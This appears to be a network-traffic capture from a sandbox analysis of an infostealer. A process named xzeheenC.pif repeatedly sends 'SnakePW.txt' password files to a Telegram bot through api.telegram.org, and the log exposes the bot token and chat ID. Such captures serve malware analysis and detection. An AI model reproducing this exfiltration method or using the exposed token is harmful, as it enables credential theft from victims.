                                                                                                        2024-12-18 15:32:01 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419174,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535921,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        79192.168.2.849832149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:01 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd210b4912642d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:01 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 30 62 34 39 31 32 36 34 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd210b4912642dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:02 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:02 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419176,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535922,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        80192.168.2.849837149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:02 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd223310119778
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:02 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 33 33 31 30 31 31 39 37 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd223310119778Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:03 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:03 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419178,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535922,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        81192.168.2.849839149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:03 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21b2badf5d23
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:03 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 62 32 62 61 64 66 35 64 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21b2badf5d23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:03 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:03 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:03 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419180,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535923,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        82192.168.2.849840149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:03 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21254f48c305
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:03 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 32 35 34 66 34 38 63 33 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21254f48c305Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:04 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419182,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535924,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        83192.168.2.849845149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:04 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd225771662831
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:04 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 35 37 37 31 36 36 32 38 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd225771662831Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:04 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419184,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535924,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        84192.168.2.849847149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:05 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21d6aa07b8e0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:05 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 64 36 61 61 30 37 62 38 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21d6aa07b8e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:05 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:05 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:05 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 32 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419186,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535925,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        85192.168.2.849848149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:05 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd213f3d4bedcb
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:05 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 33 66 33 64 34 62 65 64 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd213f3d4bedcbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:06 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:06 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
